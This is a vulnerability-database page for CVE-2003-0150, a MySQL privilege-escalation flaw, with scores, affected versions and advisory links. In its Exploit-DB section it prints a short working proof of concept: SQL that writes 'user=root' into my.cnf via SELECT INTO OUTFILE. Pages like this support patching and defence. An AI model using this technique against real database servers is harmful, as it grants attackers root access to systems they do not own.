CVE-2003-0150 : Detail

CVE-2003-0150

7.64%V3
Network
2003-03-21
04h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

MySQL 3.23.55 and earlier creates world-writeable files and allows mysql users to gain root privileges by using the "SELECT * INFO OUTFILE" operator to overwrite a configuration file and cause mysql to run as root upon restart, as demonstrated by modifying my.cnf.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9 AV:N/AC:L/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22340

Publication date : 2003-03-07 23h00 +00:00
Author : [email protected]
EDB Verified : Yes

source: https://www.securityfocus.com/bid/7052/info A vulnerability has been discovered for MySQL that may allow the mysqld service to start with elevated privileges. An attacker can exploit this vulnerability by creating a DATADIR/my.cnf that includes the line 'user=root' under the '[mysqld]' option section. When the mysqld service is executed, it will run as the root user instead of the default user. This may allow an attacker to obtain elevated privileges on a compromised system. mysql>CREATE DATABASE roottext; mysql>USE roottext; mysql>CREATE TABLE hack (conf VARCHAR(80)); mysql>INSERT IN hack VALUES ('[mysqld]'); mysql>INSERT IN hack VALUES ('user=root'); mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack mysql>QUIT

Products Mentioned

Configuraton 0

Oracle>>Mysql >> Version 3.23.52

Oracle>>Mysql >> Version 3.23.53

Oracle>>Mysql >> Version 3.23.53a

Oracle>>Mysql >> Version 3.23.54

Oracle>>Mysql >> Version 3.23.54a

Oracle>>Mysql >> Version 3.23.55

References

http://marc.info/?l=bugtraq&m=104800948128630&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000743
Tags : vendor-advisory, x_refsource_CONECTIVA
http://marc.info/?l=bugtraq&m=104802285012750&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.debian.org/security/2003/dsa-303
Tags : vendor-advisory, x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2003-094.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=MDKSA-2003:057
Tags : vendor-advisory, x_refsource_MANDRAKE
http://www.kb.cert.org/vuls/id/203897
Tags : third-party-advisory, x_refsource_CERT-VN
http://marc.info/?l=bugtraq&m=104739810523433&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.redhat.com/support/errata/RHSA-2003-093.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/7052
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=104715840202315&w=2
Tags : mailing-list, x_refsource_BUGTRAQ